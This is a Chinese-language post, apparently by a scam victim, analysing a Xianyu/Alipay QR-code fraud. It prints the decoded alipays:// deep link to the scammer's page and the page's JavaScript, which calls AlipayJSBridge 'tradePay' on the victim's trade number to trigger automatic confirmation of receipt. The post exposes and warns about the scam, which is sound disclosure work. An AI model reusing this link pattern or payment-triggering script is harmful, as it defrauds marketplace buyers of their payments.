骗子手法：支付宝和闲鱼存在漏洞，当你在闲鱼下单之后，就算你没有点击确认收货按钮，你的订单状态也可能被更新为确认收货并导致钱款打入卖家账户。

这个二维码通过闲鱼扫描之后会跳转到支付宝，支付宝支付一元之后，闲鱼突然自动收货了，此时骗子收到钱了之后把我拉黑了。

二维码解码

在我意识到被骗之后，我对二维码内容进行了解码分析,二维码解码内容如下：

alipays://platformapi/startapp?appId=20000067&url=http://kgnb763n.blogqt.gq/index.php

这段代码的意思打开支付宝APP并跳转到http://kgnb763n.blogqt.gq/index.php这个URL网页。

阿里代码审核不严谨

api没做限制，任意url页面js任意调用导致.

网页代码分析

在浏览器中打开网页：

骗子代码判断了user-agent来判断是否为支付宝平台，这里我模拟一下支付宝的ui

模拟完成之后顺利出现了骗子网页。

通过查看JS代码，我发现骗子主要是通过这段代码来进行闲鱼的自动确认收货。

  document.querySelector('.tradeno').addEventListener('click',
     function() {
        
            AlipayJSBridge.call("tradePay",
         {
            
                  tradeNO: "2023042622001174211404250439"
                
        },
         function(result) {
            
                 
                
        });

这段代码的意思是当你点击支付按钮的时候，会调用支付宝的API来弹出快捷支付，支付的订单是你和骗子交易的支付宝交易号。